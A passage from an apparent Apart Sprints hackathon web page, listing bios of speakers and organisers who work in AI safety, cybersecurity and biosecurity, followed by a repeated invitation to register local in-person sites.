Esben is the CEO and Chariman of Apart. He has published award-winning AI safety research in various domains related to cybersecurity, autonomy preservation, and interpretability. He is involved in numerous efforts to ensure AI remains safe for humanity.

Joshua Landes

Organiser

Joshua Landes leads Community & Training at BlueDot Impact, where he runs the AISF community and facilitates AI Governance and Economics of Transformative AI courses. Previously, he worked at AI Safety Germany and the Center for AI Safety, after managing political campaigns for FDP in Germany.

Raina McIntyre

Speaker

Raina MacIntyre is Head of the Biosecurity Program at the Kirby Institute, UNSW Australia. She is a physician and epidemiologists, recognized internationally for her research on prevention and detection of epidemic infections, with a focus on pandemics, epidemics, bioterrorism and vaccines.

Zainab Majid

Speaker

Zainab works at the intersection of AI safety and cybersecurity, leveraging her expertise in incident response investigations to tackle AI security challenges.

Al-Hussein Saqr

Organizer

Registered Local Sites

Register A Location

Beside the remote and virtual participation, our amazing organizers also host local hackathon locations where you can meet up in-person and connect with others in your area.

The in-person events for the Apart Sprints are run by passionate individuals just like you! We organize the schedule, speakers, and starter templates, and you can focus on engaging your local research, student, and engineering community.

Registered Local Sites

Register A Location

Beside the remote and virtual participation, our amazing organizers also host local hackathon locations where you can meet up in-person and connect with others in your area.

The in-person events for the Apart Sprints are run by passionate individuals just like you! We organize the schedule, speakers, and starter templates, and you can focus on engaging your local research, student, and engineering community.